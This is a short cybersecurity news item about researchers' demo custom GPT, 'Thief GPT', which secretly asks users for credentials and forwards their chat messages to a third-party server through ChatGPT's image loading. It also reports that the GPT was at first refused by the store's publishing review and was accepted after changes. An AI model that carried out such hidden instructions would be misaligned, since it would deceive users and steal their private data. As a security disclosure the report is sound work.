In November 2023, OpenAI released GPTs publicly for everyone to create their customized version of GPT models.
Several new customized GPTs were created for different purposes.
On the other hand, threat actors can also utilize this public GPT model to create their versions of GPTs to perform various malicious activities.
Researchers have developed a new GPT to demonstrate the ease with which cybercriminals can steal user information, such as chat messages and passwords, or create malicious code through certain chat requests.
This new malicious ChatGPT agent was created to forward users' chat messages to a third-party server and ask for sensitive information such as username and password.
This was possible as ChatGPT loads images from any website, which requires data to be sent to a third-party server.
A GPT can also contain instructions to ask the user for information and can send it anywhere, depending upon the configuration of the GPT. The new demo GPT was named Thief GPT and was capable of asking questions to the user to send it to a third-party server secretly.
When publishing it to users, there were specific guidelines that denied the request.
According to the documentation, ChatGPT allows three types of publishing for creators-only me, Anyone with a link, and Public.
Later, it was quickly fixed and was accepted by the GPT store.
This led to the conclusion that there are chances for malicious actors to utilize this publicly available GPT code for malicious purposes.
A complete report has been published, which provides details about the method, usage, and other information.
This Cyber News was published on cybersecuritynews.com. Publication date: Sat, 23 Dec 2023 09:45:12 +0000